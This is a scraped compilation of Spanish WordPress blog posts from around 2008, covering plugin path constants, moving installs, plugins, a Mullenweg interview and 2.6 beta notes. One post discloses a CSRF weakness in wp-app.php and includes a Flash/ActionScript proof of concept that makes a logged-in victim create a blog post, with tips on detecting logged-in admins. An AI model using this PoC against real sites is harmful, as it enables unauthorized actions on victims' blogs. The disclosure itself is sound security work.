1. El directorio wp-content
Vimos que Wordpress daba la posibilidad de sacar la carpetawp-content/ de la carpeta web y esto ha ocasionado una gran cantidad de cambios entre ellos el nacimiento de dos nuevas variables globales que se encargan de conocer la nueva ruta.
Actualmente usamos la variable global ABSPATH para hacer referencia a la ruta de la raiz de nuestro Wordpress.
$plugin_path = ABSPATH . '/wp-content/plugins/' . plugin_basename(dirname(__FILE__));
$plugin_url = get_option('siteurl') . '/wp-content/plugins/' . plugin_basename(dirname(__FILE__));wp-content/ colgando de la raíz de Wordpress. Por ese motivo tendremos que reemplazarlo para tener un código más permisivo:
// Pre-2.6 compatibility
if ( !defined('WP_CONTENT_URL') )
define( 'WP_CONTENT_URL', get_option('siteurl') . '/wp-content');
if ( !defined('WP_CONTENT_DIR') )
define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' );
// Cogemos la ruta
$plugin_path = WP_CONTENT_DIR.'/plugins/'.plugin_basename(dirname(__FILE__));
$plugin_url = WP_CONTENT_URL.'/plugins/'.plugin_basename(dirname(__FILE__));WP_CONTENT_DIR y WP_CONTENT_URL, dos variables globales que tendremos que tener muy presentes.
2. Incluyendo el fichero wp-config.php
El fichero wp-config.php tambien permite ser sacado de nuestra carpeta web, lo que significa que tenemos el mismo problema anterior, no debemos creer que todos los usuarios lo tendrán instalado en la raiz de su Wordpress. Antíguamente, al estar wp-content/ en la raiz podíamos usar../../../ para llegar al directorio raiz y usar wp-config.php en nuestros plugins.
require_once('../../../wp-config.php');$root = dirname(dirname(dirname(dirname(__FILE__))));
if (file_exists($root.'/wp-load.php')) {
// WP 2.6
require_once($root.'/wp-load.php');
} else {
// Antes de 2.6
require_once($root.'/wp-config.php');
}Artículos relacionados
- Plugins esenciales para Wordpress
- Los 8 mejores plugins para Wordpress
- FeedStats entre los mejores plugins de estadísticas para Wordpress
- 12 plugins para Wordpress por Mangas Verdes
- 10 plugins para mejorar la seguridad de nuestro Wordpress
Sembrado estuvo Matt Mullenweg en una reciente entrevista que le hicieron en InfoTechnology, cuando dijo que el WordPress ideal sería una mezcla de Mac OS X, Windows, pero Open Source.
Reproducimos aquí la entrevista para que no te pierdas las impresiones del fundador de WordPress, ese chaval tan majo que tantas alegrías nos da …
¿Cuándo te diste cuenta de que Wordpress iba a ser muy grande?
Creo que todavía no es tan grande.Pero, ¿no lo considera popular?
Popular puede ser pero creo que todavía le falta mucho para ser lo que nosotros queremos. Todavía estamos dando nuestros primeros pasos.Con los que obtuvieron millones de usuarios.
Creo que tenemos una base de usuarios apasionada. En ese sentido somos bastantes parecidos a Apple. No apuntamos a ser los primeros sino a tratar de tener los usuarios más creativos e inteligentes.
Habla de Apple, ¿quiere que su empresa sea como Apple?No en el tamaño pero sí en la manera de ser. También rescato algunas cosas puntuales de Microsoft. Tengo mucho respeto por las dos: Microsoft y Apple. Me encantan los sistemas de la compañía de Steve Jobs, me gusta la manera en que hacen las cosas. Pero creo que ambas son compañías problemáticas, en términos de apertura.
No es el mejor lugar para desarrollar sistemas revolucionarios. Me encantaría ser un hibrido entre ambas. Si pudiera tener la usabilidad de Apple y algunos aspectos de las plataformas de Microsoft creo que Wordpress, y otros proyectos paralelos, serían una plataforma increíble. A eso le sumaría aplicaciones open source. El Wordpress ideal sería una mezcla de Apple y Microsoft más software libre.
¿Crees que open source crecerá como modalidad de desarrollo?
Sí. Creo que es el futuro de todo el software.¿Se refiere a aplicativos hogareños o también a software corporativo como los ERPs?
Me refiero a todo el software. Igualmente soy consciente de que es más difícil llegar a lasempresas. Muchas empresas están apostando a la llegada del software libre a las corporaciones. Debería funcionar.
¿Qué fue lo peor de crecer tan rápidamente?
Yo estoy en desacuerdo con que crecimos de manera rápida. Van a ser cuatro años ya desde que salimos al ruedo. Fue un despegue despacio. “Una buena comida lleva bastante tiempo de cocción” es una buena frase. La peor parte de todo este proceso sin dudas tiene que ver con las personas que abandonaron el proyecto. Nunca es bueno perder gente con talento. Ahora todos quieren trabajar con nosotros pero en algún momento fue complicado.
Interesante ¿no?. El caso es que deja bien claro que es lo que le gusta de Apple pero no dice que es lo que le gusta de Microsoft ¿lo habrá dicho por quedar bien?.
También te puede interesar:
El programador Chris Jean ha publicado un nuevo plugin llamado WP Easy Uploader que permite subir imágenes, plugins, incluso themes sin salir del panel de administración de WordPress, o sea, que te puedes olvidar del cliente FTP.
Es un plugin genial que, a través del panel propio que integra, te permite subir todo tipo de archivos, y no solo archivos “normales” sino que puedes subir los ficheros comprimidos en zip, tar, gz, tar.gz, tgz, y tar.bz2 y colocarlos en la carpeta que quieras.
Un auténtico campeón que te permite realizar todas las tareas relacionadas con tus artículos sin salir de WordPress, y muy útil en esas ocasiones en que no tienes acceso FTP.
Puedes descargar el plugin del blog del autor.
También te puede interesar:
Se avecina una nueva actualización de WordPress
y ya se puede descargar la versión beta: WordPress 2.6 Beta 2.
Mientras que llega, podemos ir revisando estos enlaces relacionados con estes sistema de publicación:
- 10 Cosas a hacer después de instalar WordPress
- Las 26 mejoras de WordPress 2.6
- 61 Themes Wordpress
- 40 consejos y trucos para Wordpress
- WordPress Theme Design
- Trucos útiles para wordpress
- WordPress Blogs and More Hacked by Google Redirects
- Lista de 450 plugins para WordPress
- 20 temas de WordPress para escritores
- Plugin para detectar errores 404 en Wordpress
- 10 temas para utilizar a WordPress como un cms
- Crea tus posts offline con WordPress gracias a Google Gears
Gracias por leer este post.
También puedes suscribirte a Bla Bla Blog! o a cualquiera de los blogs del anillo Minoic Net
Puedes votar este post en Bitacoras.com.
WordPress 2.6 Beta 2 ya está disponible para descarga en este enlace.
También te puede interesar:
Ya esta disponible una nueva versión beta de WordPress 2.6, en concreto la beta 2:
- Corrección de errores en inserción y edición de imágenes.
- Corregido soporte SS.
- Corregidos problemas con i18.
- Más documentación nueva en línea.
- Implementación de auto-sugerencia de etiquetas.
- TinyMCE 3.1.1 con Opera 9.5 y Safari ya funciona correctamente.
- jQuery UI 1.5.1
Ver al lista completa de cambio en la beta 2.
Descargar WordPress 2.6 beta 2.
vía: boren.nu
Artículo original publicado en: Carrero
Te invitamos a conocer lo útimo en Decoración 2.0, Educación 2.0, Juegos Gratis y Monólogos.
Mover los archivos de WordPress de una carpeta a otra es en ocasiones interesante, pero hay que hacerlo con cuidado.
Una situación muy común es cuando has hecho tu primera instalación en la carpeta 'WordPress' y, al poco tiempo, te das cuenta de que no es precisamente la dirección mas intuitiva posible, y prefieres cambiarla algo mas intuitivo y fácil de teclear como 'Blog' para que tus lectores accedan tecleando "dominio.com/blog/".
Vamos a ver como se hace paso a paso:
- Crea la nueva carpeta de una de estas 2 maneras:
- Si vas a mover los archivos básicos de WordPress a una carpeta nueva crea el nuevo directorio.
- Si quieres mover tu WordPress a la carpeta raiz, para que se acceda solo con teclear el nombre de dominio, asegúrate de que los ficheros index.php, .htaccess, y otros archivos pueden guardarse y moverse a la carpeta raiz, pues hay ocasiones en que el servidor no te permitirá hacerlo.
- Accede a tu blog.
- Ve a Administración > Opciones > General.
- En la caja llamada Dirección de WordPress (URL): cambia la dirección a la nueva ruta donde vayas a poner tus archivos de WordPress (por ejemplo al dominio principal)
- En la caja llamada Dirección del Blog (URL): cambia la dirección a la nueva localización, o sea, lo mismo que pusiste en la caja anterior.
- Haz clic en Guardar Cambios
- (No trates de entrar/ver tu blog ahora)
- Borra la carpeta wp-content/cache.
- Mueve los archivos de WordPress a la nueva localización (carpeta nueva o directorio raiz). Esto incluye los archivos sueltos, carpetas y subcarpetas - todo
- Si cambiaste los Permalinks (enlaces permanantes), accede a la pantalla Administración > Opciones > Enlaces Permanentes y actualiza tu estructura de permalinks para que modifique el fichero .htaccess, que debería estar en la misma carpeta que el archivo index.php
- Si tuvieras problemas por imágenes o archivos que no se encuentren, a pesar de haberlas subido, tendrás que cambiar la ruta a las imágenes de los posts en la base de datos SQL. Para facilitar esta tarea te recomiendo el plugin Search and Replace, un imprescindible
Es muy importante que cambies la localización de las URLs antes de mover los archivos.
Imagina que, accidentalmente, mueves los archivos antes de cambiar las URLs. Supongamos que los archivos estaban en /ruta/blog/viejo/ y los moviste a /ruta/blog/nuevo/ antes de cambiar las URLs. El modo de arreglar esto sería hacer un enlace simbólico de una ruta a otra (un acceso directo para los usuarios de Windows que no conozcan esta terminología), algo así:
-
ln -s /ruta/blog/nuevo /ruta/blog/viejo
y luego seguir los pasos a partir de ahí. Mas tarde podrás borrar el enlace simbólico si quieres. Estoy seguro de que no quieres hacer esto porque para ello debes tener acceso SSH a tu servidor, y esto no siempre es posible. Mejor sigue los pasos tal cual.
Bueno, pues eso es todo, tampoco es tan difícil. Comprueba tu sitio para asegurarte de que funciona todo bien. Si el cambio supone una nueva dirección para el blog informa a tus lectores y nunca estará de mas hacer estos pasos adicionales:
- Cambia la dirección de tu RSS de Feedburner
- Haz una redirección en el archivo .htaccess
Me he inspirado para este post en la madre del cordero, el Codex, y lo he adaptado y ampliado con algunos trucos y consejos
Contenido exclusivo para suscriptores al Feed
¡Gracias por seguirnos a diario!. Premiamos tu fidelidad ofreciéndote habitualmente contenidos exclusivos. Hoy puedes descargar:
Guía Domina tu BlogTambién te puede interesar:
Seguramente has visto los comentarios de algún blog que corre Wordpress, que además de mostrar el nombre y la URL del comentarista en cuestión, también son visibles tanto el navegador que utilizó para hacer el comentario como también desde qué sistema operativo lo hizo. Si no recuerdan o simplemente no lo conocen podrán verlo en la siguientes imágenes que saqué del blog de Iceman, donde por primera vez vi a este interesante agregado que le podemos ponerle a los comentarios.
Browser Detection Plugin se encarga de este trabajo, y trae íconos para la mayoría de los navegadores y OS’s que se encuentran en el mercado, incluso detecta a Lynx o Sony PSP, y en Tecnoswa existe un excelente tutorial sobre el mismo donde toca incluso los inconvenientes que tuvo para dejarlo funcionando.
A estas alturas imagino que la mayoría ya sabe que en cada instalación nueva de WordPress 2.6, tanto la publicación por XMLRPC como APP estarán desactivados por omisión. A pesar de que algunos inicialmente pegaron un grito al cielo por este cambio, personalmente creo que es un cambio acertado, puesto que seguramente reducirá el número de vectores de ataque en aquellos blogs que no necesiten de éstos protocolos.
Sin ir muy lejos, actualmente la forma como está implementado APP en WordPress (y probablemente en otros CMSs), lo hace a este último, vulnerable a ataques CSRF usando Flash, que como se sabe, se puede usar para sobrepasar distintas restricciones de seguridad [1]. La siguiente porción de código muestra que tan sencillo es aprovechar este problema de seguridad en el protocolo mencionado:
// En este caso simplemente crea una nueva entrada.
function WpApp() {
this.readQueryString();
var blog:String = _params.blog;
if ( !blog ) return;
var r:URLRequest = new URLRequest(blog + '/wp-app.php?action=/posts');
r.method = 'POST';
r.data = '<?xml version="1.0" encoding="UTF-8"?>'+
'<rss version="2.0"' +
'xmlns:content="http://purl.org/rss/1.0/modules/content/"' +
'xmlns:wfw="http://wellformedweb.org/CommentAPI/"' +
'xmlns:dc="http://purl.org/dc/elements/1.1/"' +
'xmlns:atom="http://www.w3.org/2005/Atom">'
'<channel>'+
'<atom:entry>'+
'<title>Boo</title>'+
'<category domain="category" nicename="uncategorized" term="uncategorized"><![CDATA[Uncategorized]]></category>'+
'<content><![CDATA[boo!]]></content>'+
'</atom:entry>'+
'</channel>'+
'</rss>';
r.contentType = 'application/atom+xml';
navigateToURL(r, '_self');
}Lo único que el atacante necesitaría, sería identificar si la víctima inició sesión o no, y lo primero que se me viene a la mente en estos momentos es enviar un pingback y luego verificar que hizo click desde algún lado del panel de administración — ¡a que no soy el único que mira los enlaces entrantes! 
Los problemas que comento han sido reportados hace mes y medio aproximadamente, pero hasta el momento sólo hicieron una corrección puntual para la prueba de concepto que envié, por lo que no sería mala idea eliminar este archivo (wp-app.php o app.php) o denegar el acceso al mismo.
[1] Por ejemplo las páginas que permiten subir archivos y que generalmente no tienen protección contra ataques CSRF. Actualmente casi todas las versiones de WordPress sufren este problema y se puede explotar usando lo descrito en Cross-site File Upload Attacks.
- Correcciones en inserción y edición de imágenes
- Correcciones en conexión SSL
- Correcciones en internacionalización (i18n )
- Mejoras en la documentación interna
- Mejoras en el suggest de los tags
- Correcciones en TinyMCE 3.1.1 con Opera 9.5 y Safari
- jQuery UI 1.5.1
- Muchas más...
Artículos relacionados
- Wordpress 2.3 beta 2
- Firefox 3 beta 4 disponible para descargar
- Wordpress 2.0.6 disponible para descargar
- Wordpress 2.1 Beta 1
- Disponible Wordpress 2.3 beta 1
